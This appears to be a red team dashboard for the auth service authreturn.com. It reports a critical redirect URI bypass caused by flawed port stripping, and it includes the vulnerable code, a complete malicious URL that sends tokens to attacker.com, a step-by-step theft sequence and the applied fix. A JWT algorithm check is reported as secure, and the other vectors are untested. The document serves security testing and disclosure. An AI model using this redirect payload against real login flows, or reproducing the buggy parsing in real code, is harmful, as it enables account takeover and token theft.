Red Team Dashboard

Security Findings for authreturn.com

v1.0.2

Critical Findings

1

Secure

1

Not Tested

4

Redirect URI Validation Bypass

Critical

Summary

Open redirect vulnerability allows attackers to steal authentication tokens by exploiting URL parsing differences between the server and browsers.

Vulnerable Code

File: auth-return-server.py lines 106-109

redirect_domain = parsed.netloc.lower()
# Remove port if present for comparison
if ':' in redirect_domain:
    redirect_domain = redirect_domain.split(':')[0]  # BUG!

The Problem

The code attempts to strip ports by splitting on :, but this fails for URLs with userinfo format (user:pass@host). The server extracts the wrong component.

Attack Vector

Malicious URL:

https://authreturn.com/auth/login?app_id=123&redirect_uri=https://allowed.com:x@attacker.com/steal
  1. Server parses netloc = "allowed.com:x@attacker.com"
  2. Server sees :, splits, takes [0] = "allowed.com"
  3. Server validates against allowlist → PASSES!
  4. User authenticates on legitimate authreturn.com login page
  5. Server redirects with token to the "validated" URL
  6. Browser interprets allowed.com:x as credentials
  7. Browser navigates to attacker.com/steal?token=JWT
  8. Attacker receives victim's valid 30-day JWT!

Impact

  • Complete account takeover - Attacker obtains valid JWT
  • Affects all integrating apps - Any app using authreturn.com
  • Invisible to user - Victim sees legitimate login page
  • Token valid 30 days - Long exploitation window

Fix Applied

Use parsed.hostname which correctly extracts just the hostname:

# Use hostname property to correctly extract host, ignoring userinfo and port
# This prevents bypass via URLs like https://allowed.com:x@attacker.com/
redirect_domain = parsed.hostname.lower() if parsed.hostname else ''

JWT Algorithm Confusion

Secure

Test Result

The JWT implementation correctly specifies allowed algorithms, preventing alg:none and algorithm confusion attacks.

Secure Code

File: tokens.py line 32

payload = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])

The explicit algorithms=['HS256'] parameter ensures PyJWT rejects any token not using HS256.

Testing Status

Overview
Attack Vector Status Severity
JWT Algorithm Confusion Secure N/A
Redirect URI Bypass Vulnerable (Fixed) Critical
Rate Limit Bypass (X-Forwarded-For) Not Tested TBD
Password Reset Token Enumeration Not Tested TBD
CSRF on POST Endpoints Not Tested TBD
User Enumeration Not Tested TBD